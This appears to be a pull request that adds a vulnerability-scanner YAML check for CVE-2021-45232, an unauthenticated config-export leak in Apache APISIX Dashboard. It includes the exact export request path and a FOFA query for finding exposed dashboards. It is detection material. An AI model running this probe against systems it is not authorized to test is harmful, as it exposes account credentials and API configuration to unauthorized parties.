### PR TITLE
Apache APISIX Dashboard 未授权访问漏洞 CVE-2021-45232

### DIFF
--- a/pocs/apache-apisix-dashboard-cve-2021-45232-info-leak.yml
+++ b/pocs/apache-apisix-dashboard-cve-2021-45232-info-leak.yml
@@ -1,0 +1,15 @@
+name: poc-yaml-apache-apisix-dashboard-cve-2021-45232-info-leak
+transport: http
+rules:
+    r1:
+        request:
+            method: GET
+            path: "/apisix/admin/migrate/export"
+        expression: |
+            response.status == 200 && response.body.bcontains(b"Counsumers") && response.body.bcontains(b"Routes")
+expression:
+    r1()
+detail:
+    author: 凉风(https://github.com/c0olw)
+    links:
+        - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45232


### PR DESCRIPTION


----------

## 本 poc 是检测什么漏洞的
Apache APISIX Dashboard 未授权访问漏洞 CVE-2021-45232

## 测试环境
FOFA 语法：
title="Apache APISIX Dashboard"

## 备注
![image](https://user-images.githubusercontent.com/32671990/147628828-35e2e22c-a918-470c-8a4d-1cb4d3242bd5.png)
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45232
Apache APISIX Dashboard 未授权访问漏洞，有可能泄漏账号密码、接口信息等。
